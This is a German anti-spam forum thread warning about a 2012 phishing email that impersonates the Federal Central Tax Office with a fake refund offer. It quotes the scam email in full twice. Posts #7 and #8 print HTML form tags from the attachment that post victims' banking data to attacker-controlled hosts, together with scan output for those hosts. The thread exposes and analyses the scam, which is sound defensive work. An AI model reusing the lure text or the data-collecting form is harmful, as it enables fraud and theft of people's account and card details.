Ergebnis 1 bis 9 von 9

Thema: Bundeszentralamt für Steuern ... HINWEIS DER STEUERERKLÄRUNG FÜR DAS JAHR 2011

  1. #1
    Dave Nul Avatar von Werbehasser
    Registriert seit
    28.07.2005
    Ort
    E - 07181 Portals Nous/Mallorca
    Beiträge
    1.363

    Standard Bundeszentralamt für Steuern ... HINWEIS DER STEUERERKLÄRUNG FÜR DAS JAHR 2011

    WARNUNG vor Bundeszentralamt für Steuern ... HINWEIS DER STEUERERKLÄRUNG FÜR DAS JAHR 2011

    Datum 07 Juni 2012
    Unsere Referenz B/23260/12
    Ihr Zeichen 09C/412/12

    HINWEIS DER STEUERERKLÄRUNG FÜR DAS JAHR 2011

    Sehr geehrte Steuerzahler,

    Nach den letzten Berechnungen des jährlichen steuerlichen Ihre Tätigkeit haben wir festgestellt, dass Sie Anspruch auf eine Steuererstattung von 233,14 EUR erhalten sollen.
    Um Ihre Rücksendung erhalten, füllen Sie bitte das Steuerformular im Anhang zu dieser E-Mail und ermöglichen es uns 3-5 Werktage, um es zu verarbeiten.
    Mit freundlichen Grüßen
    T*** B***
    Bundeszentralamt für Steuern
    Und an dieser Mail hängt dann noch ein html Anhang ...
    Geändert von Mittwoch (08.06.2012 um 17:54 Uhr) Grund: Anonymisiert
    "Vor Gericht und auf hoher See sind wir allein in Gottes Hand"

  2. #2
    Ritter der Tafelrunde Avatar von Arthur
    Registriert seit
    15.01.2007
    Ort
    Avalon
    Beiträge
    11.254

    Standard

    http://www.vzsa.de/UNIQ133915147531860/link1071661A.html
    http://www.vzsa.de/UNIQ1339151475318...k1071661A.html
    Zitat Zitat von Pressemitteilung der Verbraucherzentrale Sachsen-Anhalt 23.05.2012
    Angebliche Rückzahlung vom Bundeszentralamt für Steuern Vorsicht vor gefälschter E-Mail
    Eine Mail unter dem Betreff "Bekanntmachung über die Steuererklärung" landet derzeit in vielen Mail-Postfächern.
    Es klingt höchst amtlich und zugleich überaus erfreulich: Das "Bundeszentralamt für Steuern" teilt mit, der "sehr geehrte Steuerzahler" werde eine Steuererstattung von 243,54 Euro erhalten.
    Diese Mail stammt aber keineswegs von der Behörde in Bonn. Vielmehr versuchen hier Betrüger an die Konto- und Kreditkartendaten der Adressaten zu kommen. Beim aufmerksamen Lesen erkennt man am holprigen Deutsch die Fälschung.

  3. #3
    Senior Mitglied
    Registriert seit
    23.03.2011
    Ort
    Hamburg
    Beiträge
    1.369

    Standard

    Üsch zahle gar keine Steuern....


    Sorry, den konnte ich mir nicht verkneifen..

  4. #4
    Senior Mitglied Avatar von Hippo
    Registriert seit
    05.08.2010
    Beiträge
    1.934

    Standard

    Zitat Zitat von Werbehasser Beitrag anzeigen
    WARNUNG vor Bundeszentralamt für Steuern ... HINWEIS DER STEUERERKLÄRUNG FÜR DAS JAHR 2011
    Und an dieser Mail hängt dann noch ein html Anhang ...
    Die Mail ist international, die geht auch in der Schweiz um mit entsprechend angepaßtem Text und genauso mit einer HTML.Datei
    Wer andern eine Bratwurst brät der braucht ein Bratwurstbratgerät ...

  5. #5
    Urinstein Avatar von schara56
    Registriert seit
    03.08.2005
    Ort
    zuhause
    Beiträge
    8.883

    Standard

    Der Quelltext des Anhanges wäre durchaus von Interesse.
    Villains who twirl their mustaches are easy to spot.
    Those who cloak themselves in good deeds are well camouflaged.

    Sokath! His eyes uncovered!

  6. #6
    Senior Mitglied Avatar von Grisu_LZ22
    Registriert seit
    08.03.2006
    Ort
    Hier *wink* (hemisphaericus forumsicus)
    Beiträge
    2.444

    Standard

    Gehört aber meines Erachtens nach 1.4 Phishing/Exploit/Troianer
    Hinweis:
    Ja


    *Antrag-auf-Verschiebung-stell*
    Geändert von mareike26 (08.06.2012 um 16:38 Uhr) Grund: ja
    112 - eine echt heiße Nummer
    Ein steter Quell der Weisheit: Das
    Antispam-Wiki.
    Lesen bildet!

  7. #7
    Urinstein Avatar von schara56
    Registriert seit
    03.08.2005
    Ort
    zuhause
    Beiträge
    8.883

    Standard

    Gesammelt wird in Hippos Exemplar hier - sieht aber etwas dunkel aus:
    whois:http://host81-138-190-163.in-addr.btopenworld.com/xa/w.php
    [html]<form name="defaultForm" method="POST" action="http://host81-138-190-163.in-addr.btopenworld.com/xa/w.php">[/html]
    Code:
    Service scan
    FTP - 21	Error: ConnectionRefused
    SMTP - 25	
    HTTP - 80	Error: ConnectionRefused
    POP3 - 110	Error: ConnectionRefused
    IMAP - 143	Error: ConnectionRefused
    Die IP-Adresse whois:81.138.190.163 ist bei Spamhaus auch schon gelisted.
    Villains who twirl their mustaches are easy to spot.
    Those who cloak themselves in good deeds are well camouflaged.

    Sokath! His eyes uncovered!

  8. #8
    Urinstein Avatar von schara56
    Registriert seit
    03.08.2005
    Ort
    zuhause
    Beiträge
    8.883

    Standard

    In einem anderen Exemplar sieht die Sammlung dann so aus:
    [html]<form class="ServicebereichSuche" name="ServicebereichSuche" action="http://58.152.56.21/hkgpal/include/dict/su/w.php" method="post">[/html]
    whois:http://58.152.56.21 - ebenso bei Spamhaus gelistet.
    Code:
    Service scan
    FTP - 21	Error: ConnectionReset
    SMTP - 25	Error: TimedOut
    HTTP - 80	HTTP/1.1 200 OK
    Date: Sat, 09 Jun 2012 15:26:12 GMT
    Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/0.9.8o
    X-Powered-By: PHP/5.3.9-ZS5.6.0 ZendServer
    Set-Cookie: PHPSESSID=rjqg1a0qdvcnrs7q177mj3j9h2; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    POP3 - 110	Error: TimedOut
    IMAP - 143	* OK hkgkzpr.com IMAP4rev1 MDaemon 7.2.3 ready
    Villains who twirl their mustaches are easy to spot.
    Those who cloak themselves in good deeds are well camouflaged.

    Sokath! His eyes uncovered!

  9. #9
    Dave Nul Avatar von Werbehasser
    Registriert seit
    28.07.2005
    Ort
    E - 07181 Portals Nous/Mallorca
    Beiträge
    1.363

    Standard

    Bundeszentralamt ...

    Datum 11 Juni 2012
    Unsere Referenz D/32647/12
    Ihr Zeichen 02A/345/12
    HINWEIS DER STEUERERKLÄRUNG FÜR DAS JAHR 2011
    Sehr geehrte Steuerzahler,
    Nach den letzten Berechnungen des jährlichen steuerlichen Ihre Tätigkeit haben wir festgestellt, dass Sie Anspruch auf eine Steuererstattung von 233,14 EUR erhalten sollen.
    Um Ihre Rücksendung erhalten, füllen Sie bitte das Steuerformular im Anhang zu dieser E-Mail und ermöglichen es uns 3-5 Werktage, um es zu verarbeiten.
    Mit freundlichen Grüßen
    R*** K***
    Bundeszentralamt für Steuern
    "Vor Gericht und auf hoher See sind wir allein in Gottes Hand"

Stichworte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen